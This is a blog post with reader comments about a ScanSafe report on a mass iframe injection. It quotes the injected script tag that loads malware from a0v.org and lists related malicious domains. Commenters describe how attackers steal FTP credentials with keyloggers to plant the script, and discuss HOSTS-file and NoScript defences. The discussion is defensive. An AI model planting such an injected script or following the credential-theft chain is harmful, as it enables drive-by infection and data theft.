Project Management

ScanSafe raises alarm about thousands of compromised Web pages

ScanSafe has determined that untold thousands of Web sites are hosting malicious code, just waiting to infect computers of unsuspecting Web surfers.

ScanSafe is an acclaimed provider of Software as a Service (SaaS) Web security. I try to pay attention to their STAT Blog, it usually contains worthwhile information. Today was no exception, as foretold by the blog post's title: Up to 55K Compromised by Potent Backdoor/Data Theft Cocktail.

Infamous iFrame

ScanSafe's Mary Landesman author of the ominous-sounding post somehow found a malicious iFrame embedded in upwards of 55, 000 Web sites. That didn't mean much to me until I found out what an iFrame was. According to the Web Design Group an iFrame consists of:

"The IFRAME element defines an inline frame for the inclusion of external objects including other HTML documents. IFRAME provides similar functionality to OBJECT. One advantage of IFRAME is that it can act as a target for other links."

The last sentence is the one to pay attention to. In this particular case, the iFrame includes of the following snippet of code:

"script src=http://a0v.org/x.js"

If I understand correctly, that simple phrase will redirect Web browsers to http://a0v.org/a.js without the user knowing it.

What happens then

The Web site a0v.org is where the heavy-duty malware is. Once the Web browser is talking to a0v.org, Landesman explains a slew of malicious code consisting of trojans, backdoors, password stealers, and possibly a downloader will try to install on the visiting computer. If the operating system is Windows-based and vulnerable, the malware will successfully install.

Yes, this is yet again a Windows-only issue. Fortunately, all of our computers are up-to-date and have sufficient protection to prevent any malware from taking root. Right?

Check it out

What I find fascinating is that we can repeat Landesman's experiment, easily finding how many Web pages are currently infected. Enter "script src=http://a0v.org/x.js" in your favorite search engine and check the number of hits.

When Landesman first wrote the post, Google search found 54,900 hits. I'm getting 97,200 hits a day later. Some of the sites include feedzilla.com, latindiscover.com, and foodsresourcebank.org. Maybe it's on purpose, but no one is explaining why the number of infected Web pages is growing so fast.

A0v.org is not the only malicious Web destination. Others include: ahthja.info, gaehh.info, htsrh.info, car741.info, game163.info, car963.info, and game158.info. Landesman mentions that ahthja.info is the most prolific of the group. You may find the WHOIS record for ahthja.info interesting:

Notice the unusual registrant and street names. Seems like there is very little vetting going on at this particular registrar.

Catch 22

I am by no means a Web developer. Still, it seems we are going to have this problem until client-side scripting can be ran securely. Sure, disabling JavaScript or using an application like NoScript solves the problem. That is until you want to see what doing so has broken on the Web site.

Final thoughts

I have a pretty good idea why so many computers are vulnerable. But, what's going on with Web servers? Are the current Web server exploits so new, only the bad guys know about them? It sure seems like it.

About

Information is my field...Writing is my passion...Coupling the two is my mission.

100 comments
valvestate
valvestate

Although the article didn't implicitly say that every site visited with scripts forbidden by NoScript were not viewable, by choice of wording, the implication was sort of made. Indeed most of the 50 or so sites I clicked through to were professional looking business sites, many for retirement communities, that looked fine with all scripts forbidden. This is how a site should look if the designer is following best practices. Of course there are exceptions like sites that deal in multi-media and sites like mobo manufactures that well known and want limit the ability of people to search their sites, but for the most part a small to medium sized business would want their site to look basically the same with or without scripting. That said, NoScript was very useful for quickly telling which sites listed by Google search still had the demon a0v.org script still in it's page source, without having to veiw the source. Google spiders don't crawl the internet in real time with every search request (what a bandwidth load that would be) so many of the sites had already removed the script from thier pages. By my estimation of about the 250 returns I checked out, only one in thirty still had the subject script still in it. If the problem can be traced to a content management system, one site was generated using Drupal and a few had the look of Drupal sites. CMSs are over my head as of yet but Drupal being community generated software is my favorite. There is a slight chance that someone slipped a rouge module past the vetting commity. My last Google search for "script src=http://a0v.org/x.js" returned 345,000 results, but only 371 before the message: "In order to show you the most relevant results, we have omitted some entries very similar to the 371 already displayed. If you like, you can repeat the search with the omitted results included."

agkramos
agkramos

Michael, I tried sending email to your Kassmet site but it is not recognized, anyway I am curious how to avoid this infected sites. what do I need to do specially we research a lot online. Thanks. Alex Ramos Manila Philippines

Jacky Howe
Jacky Howe

a quick google and the result was 8,680 English pages for ?script src=http://a0v.org/x.js? from a standard search and when I clicked on the web the result was about 14,700 for ?script src=http://a0v.org/x.js?. Thanks for the insight and a better understanding of how these exploits work.

kristina_johnson
kristina_johnson

So can someone explain how does this script even gets on these legit websites, I don't understand it...

mich1fla2
mich1fla2

i got 153,000 hits on altavista.com WOW!!!!!!!

shanepc
shanepc

Just ran the Google check - 68,700 sites listed

ps.techrep
ps.techrep

This article doesn't address irresponsible website operation that allows a site to be modified without administrator or developer detection and approval, opting for self-promotion rather than remediation or prevention. If the result of entering ?script src=http:///x.js? in your favorite search engine is a reliable way to locate all sites that are criminally compromised and the perpetrating sites, then why wouldn't Google and other search engine sites automatically report the attack vectors for investigation? Simply because it ISN'T a useful method for detecting malicious activity because of false positives. The code structure could be, and is, used for legitimate purposes most of the time. the reason that it's abuse causes harm is due to a combination of inadequate website and browser security. Further, a legitimate use of the Java snippet could be compromised by DNS poisoning and site redirection. If there is a security failure here, it is mainly due to site operator negligence and an unfounded assumption by web browser developers and publishers that end-users are security astute. It isn't enough that browser plug-ins like no-script can detect and block ALL Java scripts on a site-by-site, page-by-page basis and other plug-ins warn or stop connections to blacklisted sites. This type of functionality needs to be incorporated by default in web-browsers - regardless of the user-perceived inconvenience. It's long past the time for user-convenience to be used as the rationale for internet insecurity. Lack of security standards and poor website design and operation is the responsibility of the developers and publishers of web software and the operators of websites. It's unconscionable to try to make it a web-user's responsibility to compensate for lack of basic web security, but it seems that only when the majority of users are inconvenienced by the inadequate security measures of website operators, will the political pressure on site operators increase to the point where security will be the FUNDAMENTAL BASIS of website design and operation, rather than an afterthought. This kind of alarmist after the attack investigation that lacks steps for remediation and prevention is bad journalism.

genesane
genesane

I just run it on Google and got 89000 hits... Bing brought 18500... But I didn't see A0v.org, or any of those *.info sites. Well, at least, not on the first 7 pages. But a variety of the sites, that have it, is amazing...

kenmarcus
kenmarcus

From what I have seen, the exploits are just FTPed to the sites. So a computer is infected, the FTP login info is stolen; the malware is uploaded to the site. Ken

Michael Kassner
Michael Kassner

As I mentioned earlier, Giorgio's work is amazing and I'm sure has saved me all sorts of clean up.

Michael Kassner
Michael Kassner

Nice to met you. If you want you can message me at any time. Are you referring to a network or a few computers? First and foremost, make sure your computers are up-to-date. Use Microsoft Baseline Security Analyzer or Secunia PSI to make sure. What Web browser are you using? I would suggest using Firefox 3.5.1 with Perspectives and NoScript add-ons. Just Google my name and the add-on to get to articles where I go into more detail about each add-on. I hope that helps.

Michael Kassner
Michael Kassner

Both you and Deadly Ernest have had significantly less hits than any one else. You both live in Australia as well. I wonder what if anything that has to do with it. Any ideas?

Michael Kassner
Michael Kassner

I apologize for not making that clear in the post. There are a few methods that are being used by the bad guys at this time. Web servers have operating system vulnerabilities just like any other computer. Web servers also have Web hosting programs with vulnerabilities. These vulnerabilities can be used to compromise the Web server and get the script installed. http://www.securityfocus.com/infocus/1864 Another method that is popular right now is stealing the FTP credentials to the Web Server. The process goes like this: 1. Attackers target a Web developer's computer with some kind of malware that incorporates key loggers and a phone home application. 2. Once installed, the malware will record the OS and FTP log in information when the Web developer attempts to log into the Web server. The malware will then send this information back to the attacker. 3. The attacker then can FTP into the Web server and install the script. The article link is a year old, but the process is explained quite well: http://www.scmagazineus.com/Researcher-finds-server-with-stolen-FTP-credentials/article/118756/

Neon Samurai
Neon Samurai

- Poor server security practices - Included advertising panels - Spoofed website or DNS - Network traffic injection Some of these are pretty far out there and I'm sure I'm missing even more ways to get one's data onto a website or make it appear to be part of it. I also don't know these specific sites have been modified or spoofed; just a few random guesses of how it could be done.

mich1fla2
mich1fla2

I found 153,000 hits on AltaVista.com WOW!!!

JCitizen
JCitizen

even banks purposely dumb their web-security down out of concern the client won't be able to access the account. They actually made a conscious decision to take the hit for fraud, as a cost of business!! Afraid they'd lose business to another bank with equally lax online security! I don't think we get enough articles on this all over the web. Bank managers will not read SANS, but might TechRepublic.

cuvo
cuvo

My feelings about central black lists are a little mixed up. I see two major weaknesses, which do enable doing harm, too. - Providing such services can be a very effective method, to profile users, even providing information about weaknesses of the systems used. But such profiles can be very helpfull for censors, too. So mechanisms to keep the servers personal information save, must be worked out quite comprehensively or such tools will be famous instruments for dictators, black mailers, crackers or web-marketeers "without brakes". - The back check mechanisms to blame an adress must be quite comprehensive. I remember attempts of a former collegue to use black-list-services against spammers. The company was no longer able to receive mail from any major Mail-Services-Provider in Germany for weeks. And I am sure, trying to denunciate Sites falsely, will be one of the most famous games for real saboteurs and black mailers as well as for script kiddies.

Michael Kassner
Michael Kassner

I'm sorry if you feel that way, but I don't see that. I also appreciate your insight into the situation. I also mentioned that I'm not a Web developer, thus asked: "I have a pretty good idea why so many computers are vulnerable. But, what?s going on with Web servers? Are the current Web server exploits so new, only the bad guys know about them? It sure seems like it." The attack is not by any means over. I felt compelled to warn members of a new attack vector and hinted at making sure operating systems and applications were up-to-date as that is the best protection at this time.

Michael Kassner
Michael Kassner

A0v.org is the site that compromised computers link to to down load a malware payload. I suspect that the known exploit domain names are pulled by now. It turns into a cat-and-mouse game as security people try to keep up with the bad guys. That's why I posted the WHOIS record. It's that easy for the nasty types to get new domains.

cuvo
cuvo

I do not know a lot of FTP-Servers which really are secured comprehensively against simple brute force attacks. Often you can type in wrong passwords one after another for hundrets of times without being blocked at all. FTP does not encrypt transmitted passwords. So I do wonder, why so little people are thinking about avoiding it anyway. But I do not know, if that is the only problem. Some weeks ago, I was talking to a hosting provider. He told me, it is quite a problem for his business, to keep some customers from reconfiguring there servers to lower security settings, allowing to run older software or software developed in the enclosed lab, without just for years common settings against code-injection, e.g. in Apache. I had a similar problem, too. Our marketing department had a new internet presentation of our company developed by a student. He used an XAMP environment, where it worked. It was hard work to keep our senior management from forcing me to make it run in the on-line-environment by adating especially these settings. And some marketing manageres still do not want to understand, why I enforced them to spend additional manpower and money in the sites code itself.

manwe
manwe

FTP logs can be revealing. Many attacks I see are directed at 'Administrator'. Naturally, I don't have an Administrator FTP account. Others are based on alphabetical lists of names. Probing can go on for hours. Server logs are also helpful. The web design tools people use are convenient, but can make their server vulnerable. I see probing for MyPHPAdmin in my logs. I don't use that tool. Instead I have a spoof MyPHPAdmin written in PHP to capture the attack. I'm may automate an abuse report. Whether I do or not depends on the accuracy of the IP address captured in my trap. I am now collecting IPs using multiple methods to determine the most accurate approach. I also use non-standard path names to prevent automated probing attacks. Downloading and installing software packages will give you paths that others already know and can exploit. Logs can provide a warning about software that may be vulnerable.

traef
traef

Yes many of the recent iframe injections are the result of compromised FTP credentials but these are mostly affecting .asp and .aspx pages which are dynamically generated thereby leading to the belief that they're SQL injections rather than compromised FTP credentials.

edthered
edthered

A friends site got hit because they gave their FTP info to someone so that they could transfer files in, then the someone's computer was compromised at another site and my friends FTP info was in the hands of the bad guys. Granted, they shouldn't be giving the FTP info out, but they, like so many others, didn't know any better.

Ocie3
Ocie3

127.0.0.1 http://a0v.org/x.js to HOSTS. [b](DO NOT select that link in this post unless you are prepared for trouble deep.)[/b] Firefox WOT raises a red screen warning like I've never seen before! a0v.org is the "intermediary site" which downloads malware from several others whose domains are listed in the ScanSafe STAT Blog entry. It probably would be a good idea to add them to HOSTS as well, because we never know what the next intermediary site will be (or whether there are other contemporary intermediates), and we don't want to admit anything from those other websites, which might be longer-lived. Seanferd suggests that we use a non-existent IP address instead of 127.0.0.1 in HOSTS. Giorgio Maone (the developer of NoScript) has stated that any IP address which ends in zero is "invalid", so he suggests using 255.255.255.0. However, with respect to ICANA RFC 3330, I cannot find any IP address that could actually be used "safely" for that purpose, insofar as the document apparently does not recognize that an IP address ending in zero is "invalid". "Not assigned" by ICANA is not necessarily the same as "not in use". There is a risk that any IP address which is currently in a range that is "not assigned" is now, or will be in the future, "in use". By the way, the HOSTS file that is available from MVPS.ORG was last updated on July 27, 2009, according to the download page for the HOSTS file on their website. I download their HOSTS file about once a month (if it has been updated), and add some content from another file that I maintain.

seanferd
seanferd

Pointing at the loopback is not always a good idea.

Michael Kassner
Michael Kassner

Except that it would require millions of computers to have that done. I'm not sure that possible, since it's hard to get people to update the operating system.

brenthaskell
brenthaskell

As an IT student I spend a lot of time trolling through the internet reading a lot of information. I just want to thank the publisher of this story and everyone who has given such insightful and varied responses and shared their experiences. I have learnt a lot from you all that I hope will stay with me for a long time.

Jacky Howe
Jacky Howe

Google functions differently depending on your location. OldER Mycroft and I did a search for something with Google not that long ago and we noticed that we both came up with differnt results.

Neon Samurai
Neon Samurai

I was just updating my banking ID the other day and was reminded that the online access password is "maximum" eight characters. Sure, a login attempt limit may keep the bank site safe but eight char password hash doesn't take much time to break if one sucks it out of the network traffic. Given the password limitations, assuming weaker SSL cert and version usage isn't a far stretch.

Michael Kassner
Michael Kassner

I had to work very hard to remove a company from a list. Then after all was said and done, they were on probation for several months. Not really sure what that meant, but I didn't want to find out.

bboyd
bboyd

Want to shutdown a major website from operating correctly, Spoof attacks originating from it for a while. I like white lists... Use of No-script and a personal black/whitelist make sure that external site references don't work unless i implicitly allow them. A black list Hosts file would have to be constantly updated. Now I admit a vulnerability if the primary white-listed site has been violated to gain this much access, why not just host the malware directly...

ps.techrep
ps.techrep

The vector isn't new, merely a new attack variant using known security flaws. If you want to "warn the community", suggest they subscribe to the SANS alert bulletins - and that they READ them.

Michael Kassner
Michael Kassner

I didn't think of that at all. That has to be a real problem for many Web hosts. Both running weak code and lower security. Thanks for sharing.

Michael Kassner
Michael Kassner

Experienced any exploit attempts? I would love to hear about them.

seanferd
seanferd

a0v.org You don't want the protocol in front of that in HOSTS anyway. May as well drop the directory, as that doesn't resolve in DNS either.

JCitizen
JCitizen

remembers this hack from many years ago; I'd lost track of it. This must have been the one TR featured a couple of years ago the intall method looks familiar for XP(I assume) Have you taken any performance hit from using it? On my laptop, I have one similar to ABP but it is for IE 7 XP. It updated automatically and starts out a lot like AdBlock Plus where it gives you a one time question to pick your server choice; except after that you never see it again, as it runs in the back ground. At least I assume it updated as I did have to pick an update server and language. Perhaps this is one and the same, only they dropped the auto update. I don't use my laptop much anymore, so won't be able to check on it until much later.

Michael Kassner
Michael Kassner

Why is that? I think I know, but would appreciate your opinion.

mmatchen
mmatchen

Also works, and includes a SafeSearch feature which uses RegEx to enforce searches on major search engines stay filtered. www.getk9.com

Michael Kassner
Michael Kassner

Still that means their black list has to be darn near real-time to keep up with the number of Web sites that are exploited.

stux
stux

...as part of its system immunizations. It would then be a matter of educating the public to use this as an important security tool (as well as update the immunizations frequently). It'd be nice if its updates were automatic but it's freeware; what more can you ask? I also don't bother installing their 'TeaTimer' resident protection since I find it too annoying (as in Vista UAC annoying) despite its potential usefulness. Unfortunately, education of safe security and computing practices is probably one of the biggest hurdles in securing the internet. http://en.wikipedia.org/wiki/Spybot_-_Search_%26_Destroy

Michael Kassner
Michael Kassner

Did you read "The 10 faces of malware"? It may be of help as well. Good luck in your studies.

Michael Kassner
Michael Kassner

Tbink it's set up using your IP address? I wonder why it would matter actually?

Jacky Howe
Jacky Howe

the location tag that it uses. Google.com Google.com.au Google.com.uk Other than that I'm at a loss.

Michael Kassner
Michael Kassner

Now, I am curious. Why would Google be location sensitive?

JCitizen
JCitizen

Well any improvement no matter how slight is something I guess, I wouldn't blame anyone for leaving an institution if they had bad security enforcement. Mine is giving me too good a deal to quit; but they seem to have pretty good security. It was very difficult to set up, I imagine they don't get many customers using it. I know I check all the sights I frequent with networking4all.com so see how the SSL looks. It usually points out some improper maintenance or just poor quality site security. I've had a few web-masters thank me for pointing the evaluation out. On the rest, I like Comodo Verification Engine for a quick check. The newest version seems to work well now with the updated FF and IE 8 32bit.

Michael Kassner
Michael Kassner

New attack vector versus new attack variant. OK. I get SANS reports daily, along with their tweets. Unless I have missed it, this "variant" hasn't been mentioned.

JCitizen
JCitizen

I have a bad habit of thinking people will understand what I mean by magical osmosis! I picked that up from my Dad's genome apparently. :(

seanferd
seanferd

Do you mean a HOSTS file, or the blacklist host files for ABP?

JCitizen
JCitizen

of ABP for FireFox, but I use two host files(that I'm aware of) and I've never seen better performance! Perhaps AdBlock Plus does house cleaning on their file occasionally to keep it trimmed up? I know Spybot was getting terribly bloated and slow, and using the immunization feature would probably break every time you did one of the many IE 8 updates that have come down the pike, including IE 8.

seanferd
seanferd

That's a rather good chunk of information.

Ocie3
Ocie3

The loopback interface (IP address 127.0.0.1 [i]localhost[/i]) is reportedly now obsolete -- which is the reason that some people have decided to use it for their own particular purpose, such as assigning it to a server on their LAN (?). If it is not being used for another purpose on your computer and your LAN, then there is no particular reason to not use it in HOSTS. That said, using 127.0.0.1 in HOSTS came up in the context of a Firefox NoScript bug. A lively discussion about it is at: http://hackademix.net/2009/07/01/abe-warnings-everywhere-omg/ One contributor mentioned that using an IP address other than 127.0.0.1 can lead to waiting for a response from the supposed host that has been assigned the alternative IP address, until the wait "times out". Using 127.0.0.1 is an immediate "dead end". However, Giorgio Maone stated that any IP address which ends in zero is "invalid" and he suggested that 255.255.255.0 can be used instead of 127.0.0.1. A browser should recognize that an IP address ending in zero is invalid when such an address is returned by Windows from the HOSTS file. Presumably, the browser simply should not attempt to connect to anything that has an invalid IP address. One contributor stated that using 0.0.0.0 was actually about 100 times faster for Firefox performance than using 127.0.0.1. In the RFC 3330 document that I read, ICANA does not recognize any IP address(es) as "invalid", and those ending in zero are (if memory serves) included in the various IP address ranges that they have assigned for use. Unfortunately, "reserved" and "not assigned" by ICANA is not the same as "not in use" -- including 255.255.255.0 - 255.255.255.255, or 0.0.0.0 (which I see as an endpoint for many connections in NETSTAT output). As far as I can determine, there is a risk that any IP address which is currently in a range that is "not assigned" is now, or will be in the future, "in use" -- unless we can get ICANA to designate some IP address as a safe "null" endpoint. Maybe we should ask the experts at ICANA to suggest one to use instead of 127.0.0.1 :-). Last, but not least, according to Blocking Unwanted Parasites With a HOSTS File (http://www.mvps.org/winhelp2002/hosts.htm), a HOSTS file larger than 135 KB can slow down Windows 2000/XP/Vista. Just how much Windows is "slowed down" is not disclosed. They offer a workaround that might not be acceptable on a corporate LAN, or even, in principle, on your home computer(s) and LAN.

seanferd
seanferd

but I'm sure I had learned there were others: Some software actually uses the local host/loopback interface, so with a few HOSTS entries that are used a lot (say, for blocking ads) this usage may cause problems for that software, and maybe the OS. If you have other reasons in mind, I'd appreciate reading them. But the other thing is, large HOSTS files can bog down the OS and network performance. (Which is an entirely separate thing from using 127.0.01 instead of 255.255.255.0 or something.)

mmatchen
mmatchen

I thoroughly enjoy reading your investigative articles into the various forms of malware and other security FYI's you provide. I've found them quite helpful! Glad I was able to offer a meager contribution...

Michael Kassner
Michael Kassner

I appreciate your mentioning Blue Coat. I wasn't aware of that, but will check it out now.

seanferd
seanferd

They were part of the project to block potential Conficker domains, plus they block a little bit of other malware domains.

JCitizen
JCitizen

utility is finally kapute(obsolete). Although I still miss Tea Timer, I've been getting better performance out of the free Adaware Aniversary Edition, with Adwatch enabled. You don't get the registry protection, but MBAM cleans the registry pretty well if anything tries to remain resident. I used to use A-squared to clean traces like that, but it quit updating on x64 Vista, so I switched to Super-Antispyware as a cleanup agent and deep malware scanner. I only run it when I suspect foul play after running other more efficient products. I was using AdAware Plus to double check NIS 2009, because I didn't trust the AV capabilities of Norton yet. But I've had it for nearly a year now and no viruses! So when Plus expires, I will probably revert back to AAE mode, and I may uninstall it. I only recommended it to folks that can't afford the one time license fee for MBAM. I will need a registry protector when AA+ runs out as that was the only thing on AdWatch I was using. That way it didn't conflict with NIS 2009. I'm sure there are excellent stand alone registry utilities, that could replace Tea Timer - probably ones that have been around a long time.

Michael Kassner
Michael Kassner

Not sure why, but I'm not a fan of altering the Hosts file for clients. If there was a more automated and nimble method, I might though.

Ocie3
Ocie3

is not quite the same as an anti-malware scanner using a "definitions" file, but you are right that at least some of the content of HOSTS is likely to become outdated. Accordingly, HOSTS is probably best used to block access to websites that are likely to continue in operation indefinitely (such as gambling and pornography websites that you don't want your children to visit). Eventually some URLs will be for websites that no longer exist, and there are plenty of websites that criminals use which are not likely to have their URL in HOSTS. After all, didn't NSS report 12,000 websites that had hyperlinks, each of which would cause a process to be launched that would lead to the installation of malware?? I haven't seen a HOSTS file with that many entries yet, but their database might make an interesting one! On the other hand, I don't think that we need to add the URLs for 55,000 website pages -- as reported by ScanSafe -- to HOSTS. We only need to add the URLs of the sites from which the malware is obtained, including the "intermediary" site(s) that actually do the work. (The situation is probably the same with respect to the NSS websites as well.) Spybot Search and Destroy is the only security software of which I know that actually writes a very long list into HOSTS, again, to block access primarily to websites that pander to vices such as gambling and pornography. However, I do not know how often Spybot replaces the contents of HOSTS; I haven't used Spybot S&D since June 2008.

Dr Dij
Dr Dij

there are a number of services that will scan your website for changes and / or malicious code and notify you. THey are not expensive

Michael Kassner
Michael Kassner

I am excited about heuristics, yet I see way too many false-positives right now.

Michael Kassner
Michael Kassner

But, in the mean time wouldn't it be smart for Web Hosting professionals at least to keep their servers up-to date and run scans? If I was hosting for hire, I would be worried about my reputation too much not to.

TheSwabbie
TheSwabbie

Basic security in the virtual world with a virtual .45 colt.. But how would I get it to kill them? LOL

ps.techrep
ps.techrep

You should investigate the capabilities of products from eEye and others that aren't based on signatures for their primary defense strategy.

ps.techrep
ps.techrep

The very idea that a user or site operator would need to manually initiate security scans to detect attacks after the fact is absurd. It's like expecting home-owners to periodically search their houses for intruders and damage instead of having the doors and windows locked and constantly being alert to intrusions. When will the software community start providing the same basic security in the virtual world that the physical community has had for thousands of years?

Michael Kassner
Michael Kassner

It seems to be bouncing around quite a bit. Also geographical location appears to matter. I find that strange, unless Google search patterns are not the same everywhere.

Michael Kassner
Michael Kassner

It is the same. The signature files for the application will always lag behind. This malware is rather sophisticated as well, morphing all the time to keep ahead. The best best is to keep everything up-to date.

Wick Tech
Wick Tech

Education also seems to have a limited shelf life. There's always something "more important do to". "Oh, yeah, I meant to run the check, but I had to finish this project first. And then a new project came up, and I just didn't have time, even though I know it's important". It's just like saving your work...you don't really realize how important it is until you loose that 10 page document or 200 cell spread sheet. (And in a separate thought) I got about 70,000 hits on my Google search.

Editor's Picks